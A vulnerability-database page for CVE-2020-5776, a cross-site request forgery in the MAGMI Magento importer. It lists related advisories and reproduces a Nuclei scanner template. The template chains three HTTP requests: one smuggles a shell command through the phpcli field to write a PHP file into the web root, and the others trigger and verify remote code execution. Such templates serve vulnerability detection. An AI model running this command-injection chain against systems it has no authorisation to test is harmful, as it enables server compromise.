| Reporter | Title | Published | Views | Family All 15 |
|---|---|---|---|---|
| CVE-2020-5776 | 26 Jan 202500:00 | – | circl | |
| Magneto MAGMI Remote Code Execution (CVE-2020-5776) | 15 Sep 202000:00 | – | checkpoint_advisories | |
| CVE-2020-5776 | 1 Sep 202020:34 | – | cve | |
| CVE-2020-5776 | 1 Sep 202020:34 | – | cvelist | |
| Cross-Site Request Forgery in MAGMI | 6 May 202118:54 | – | github | |
| CVE-2020-5776 | 1 Sep 202021:15 | – | nvd | |
| Magmi (Magento Mass Importer) <= 0.7.24 CSRF Vulnerability | 2 Jul 202000:00 | – | openvas | |
| CVE-2020-5776 | 1 Sep 202021:15 | – | osv | |
| GHSA-CV7M-WC7G-7GFP Cross-Site Request Forgery in MAGMI | 6 May 202118:54 | – | osv | |
| Cross site request forgery (csrf) | 1 Sep 202021:15 | – | prion |
id: CVE-2020-5776
info:
name: MAGMI - Cross-Site Request Forgery
author: dwisiswant0
severity: high
description: MAGMI (Magento Mass Importer) is vulnerable to cross-site request forgery (CSRF) due to a lack of CSRF tokens. Remote code execution (via phpcli command) is also possible in the event that CSRF is leveraged against an existing admin session.
impact: |
Successful exploitation of this vulnerability could allow an attacker to perform unauthorized actions on behalf of the victim user.
remediation: |
Implement CSRF protection mechanisms such as anti-CSRF tokens and referer validation.
reference:
- https://www.tenable.com/security/research/tra-2020-51
- https://nvd.nist.gov/vuln/detail/CVE-2020-5776
- https://github.com/sobinge/nuclei-templates
- https://github.com/404notf0und/CVE-Flow
- https://github.com/ARPSyndicate/cvemon
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
cvss-score: 8.8
cve-id: CVE-2020-5776
cwe-id: CWE-352
epss-score: 0.14725
epss-percentile: 0.96261
cpe: cpe:2.3:a:magmi_project:magmi:*:*:*:*:*:*:*:*
metadata:
max-request: 3
vendor: magmi_project
product: magmi
shodan-query:
- http.component:"Magento"
- http.component:"magento"
tags: cve,cve2020,magmi,magento,tenable,magmi_project,vkev,vuln
variables:
auth: '{{base64(username + ":" + password)}}'
flow: http(1) && http(2) && http(3)
http:
- raw:
- |
POST /magmi/web/magmi_saveprofile.php HTTP/1.1
Host: {{Hostname}}
Authorization: Basic {{auth}}
Content-Type: application/x-www-form-urlencoded
profile=default&PLUGINS_DATASOURCES%3Aclasses=&PLUGINS_DATASOURCES%3Aclass=Magmi_CSVDataSource&CSV%3Aimportmode=remote&CSV%3Abasedir=var%2Fimport&CSV%3Aremoteurl=https%3A%2F%2Fraw.githubusercontent.com%2Fprojectdiscovery%2Fnuclei-templates%2Fmaster%2Fhelpers%2Fpayloads%2FCVE-2020-5776.csv&CSV%3Aremotecookie=&CSV%3Aremoteuser=&CSV%3Aremotepass=&CSV%3Aseparator=&CSV%3Aenclosure=&CSV%3Aheaderline=&PLUGINS_GENERAL%3Aclasses=Magmi_ReindexingPlugin&Magmi_ReindexingPlugin=on&REINDEX%3Aphpcli=echo+%22%3C%3Fphp+phpinfo()%3B%22+%3E+%2Fvar%2Fwww%2Fhtml%2Fmagmi%2Fweb%2Finfo.php%3B+php+&REINDEX%3Aindexes=cataloginventory_stock&cataloginventory_stock=on&PLUGINS_ITEMPROCESSORS%3Aclasses=
matchers:
- type: dsl
dsl:
- 'status_code == 200'
- 'contains_all(body, "Profile", "saved")'
condition: and
internal: true
- raw:
- |
POST /magmi/web/magmi_run.php HTTP/1.1
Host: {{Hostname}}
Authorization: Basic {{auth}}
Content-Type: application/x-www-form-urlencoded
engine=magmi_productimportengine%3AMagmi_ProductImportEngine&ts=1598879870&run=import&logfile=progress.txt&profile=default&mode=update
matchers:
- type: dsl
dsl:
- 'status_code == 200'
internal: true
- raw:
- |
GET /magmi/web/info.php HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- 'status_code == 200'
- 'contains_all(body, "PHP Extension", "PHP Version")'
condition: and
# digest: 4a0a004730450221008f4ed51e98a42259960484d57793389f7e446e614d9b43aa5cf06ab3fa2fea670220217154aae0b99f8164deebea171a7544aafb0bd17f5952ef2994eeb7977d22a6:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation